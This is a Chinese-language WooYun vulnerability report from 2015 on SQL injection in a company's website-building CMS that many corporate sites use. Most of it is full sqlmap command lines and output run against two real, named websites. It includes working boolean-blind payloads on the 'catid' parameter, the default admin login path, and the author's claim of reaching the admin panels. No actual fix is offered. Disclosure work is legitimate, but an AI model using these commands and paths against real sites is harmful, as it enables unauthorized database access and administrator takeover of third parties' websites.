当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094429

漏洞标题:某企业建站系统SQL注入漏洞可爆管理账号进后台,影响大量企业站

相关厂商:钰诚互联

漏洞作者: 路人甲

提交时间:2015-02-02 18:28

修复时间:2015-04-30 18:48

公开时间:2015-04-30 18:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

你可以看不惯我装逼,但不可以阻止我装逼 by:helen

详细说明:

某企业建站系统SQL注入漏洞可爆管理账号进后台,影响大量企业站,demo+主站演示哦~
北京钰诚互联网站建设,针对全球不同行业的客户提供从网站建设、网络推广、网站广告、软件开发、电子商务平台到企业品牌的深度推广,为客户提供最完善的建站策略和企业推广策略。我们以最有力的整合和不断创新的力量,追求与客户之间的双嬴,始终努力成为行业最具竞争力的品牌
官网地址:http://www.ychl.org/
案例中心:http://www.ychl.org/product_cat.asp?catid=63&catname=%BE%AB%B2%CA%B0%B8%C0%FD
这只是部分精彩案例,具体的百度一下:技术支持:钰诚互联
看看安装量吧:

1.png


我在demo演示的地址中选两个测试一下吧:
北京贵有恒建材科技有限公司:http://www.gyh.com.cn/product_cat.asp?catid=67&catname=%B7%C0%B8%AF%C4%BE%BB%A4%C0%B8

[root@Hacker~]# Sqlmap -u http://www.gyh.com.cn/product_cat.asp?catid=67&catname
=%B7%C0%B8%AF%C4%BE%BB%A4%C0%B8
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 15:04:35
[15:04:35] [INFO] testing connection to the target url
[15:04:42] [INFO] heuristics detected web page charset 'ISO-8859-2'
[15:04:42] [INFO] testing if the url is stable, wait a few seconds
[15:04:45] [INFO] url is stable
[15:04:45] [INFO] testing if GET parameter 'catid' is dynamic
[15:04:46] [INFO] heuristics detected web page charset 'GB2312'
[15:04:46] [INFO] confirming that GET parameter 'catid' is dynamic
[15:04:47] [WARNING] GET parameter 'catid' appears to be not dynamic
[15:04:47] [WARNING] reflective value(s) found and filtering out
[15:04:47] [WARNING] heuristic test shows that GET parameter 'catid' might not b
e injectable
[15:04:47] [INFO] testing for SQL injection on GET parameter 'catid'
[15:04:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:04:53] [INFO] GET parameter 'catid' is 'AND boolean-based blind - WHERE or H
AVING clause' injectable
[15:04:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[15:04:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:04:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[15:04:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[15:04:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:04:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:04:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:04:59] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:05:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:05:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:05:02] [INFO] testing 'Oracle AND time-based blind'
[15:05:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:05:03] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other potential injection technique found
[15:05:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:05:29] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[15:05:54] [INFO] checking if the injection point on GET parameter 'catid' is a
false positive
GET parameter 'catid' is vulnerable. Do you want to keep testing the others (if
any)? [y/N]
sqlmap identified the following injection points with a total of 62 HTTP(s) requ
ests:
---
Place: GET
Parameter: catid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catid=67 AND 8240=8240
---
[15:06:05] [INFO] testing MySQL
[15:06:05] [WARNING] the back-end DBMS is not MySQL
[15:06:05] [INFO] testing Oracle
[15:06:06] [WARNING] the back-end DBMS is not Oracle
[15:06:06] [INFO] testing PostgreSQL
[15:06:07] [WARNING] the back-end DBMS is not PostgreSQL
[15:06:07] [INFO] testing Microsoft SQL Server
[15:06:09] [WARNING] the back-end DBMS is not Microsoft SQL Server
[15:06:09] [INFO] testing SQLite
[15:06:10] [WARNING] the back-end DBMS is not SQLite
[15:06:10] [INFO] testing Microsoft Access
[15:06:12] [INFO] confirming Microsoft Access
[15:06:13] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[15:06:13] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 67 times
[15:06:13] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[15:06:13] [INFO] fetched data logged to text files under 'E:\????\BURPSU~1\SQLM
AP~1\Bin\output\www.gyh.com.cn'


2.png


默认后台地址为:www.xxoo.com/manage/admin_login.asp

3.png


4.png


他们主站也是用的这套cms,主站也演示一下吧:http://www.ychl.org/product_cat.asp?catid=63

[root@Hacker~]# Sqlmap -u http://www.ychl.org/product_cat.asp?catid=63&catname=%BE%AB%B2%CA%B0%B8%C0%FD
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:34:27
[16:34:27] [INFO] testing connection to the target url
[16:34:31] [INFO] heuristics detected web page charset 'ISO-8859-2'
[16:34:31] [INFO] testing if the url is stable, wait a few seconds
[16:34:32] [INFO] url is stable
[16:34:32] [INFO] testing if GET parameter 'catid' is dynamic
[16:34:35] [INFO] confirming that GET parameter 'catid' is dynamic
[16:34:39] [INFO] GET parameter 'catid' is dynamic
[16:34:39] [INFO] heuristics detected web page charset 'GB2312'
[16:34:39] [WARNING] reflective value(s) found and filtering out
[16:34:39] [WARNING] heuristic test shows that GET parameter 'catid' might not b
e injectable
[16:34:39] [INFO] testing for SQL injection on GET parameter 'catid'
[16:34:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:34:47] [INFO] GET parameter 'catid' is 'AND boolean-based blind - WHERE or H
AVING clause' injectable
[16:34:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[16:34:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:34:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[16:34:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[16:34:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:34:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[16:34:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[16:34:53] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:34:54] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[16:34:54] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[16:34:55] [INFO] testing 'Oracle AND time-based blind'
[16:34:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[16:34:58] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other potential injection technique found
[16:35:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:35:13] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[16:35:33] [INFO] checking if the injection point on GET parameter 'catid' is a
false positive
GET parameter 'catid' is vulnerable. Do you want to keep testing the others (if
any)? [y/N]
sqlmap identified the following injection points with a total of 62 HTTP(s) requ
ests:
---
Place: GET
Parameter: catid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catid=63 AND 2047=2047
---


5.png


6.png


我这里都是只进一下后台,不做深入测试

漏洞证明:

4.png


修复方案:

后台都进去了你们懂得!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝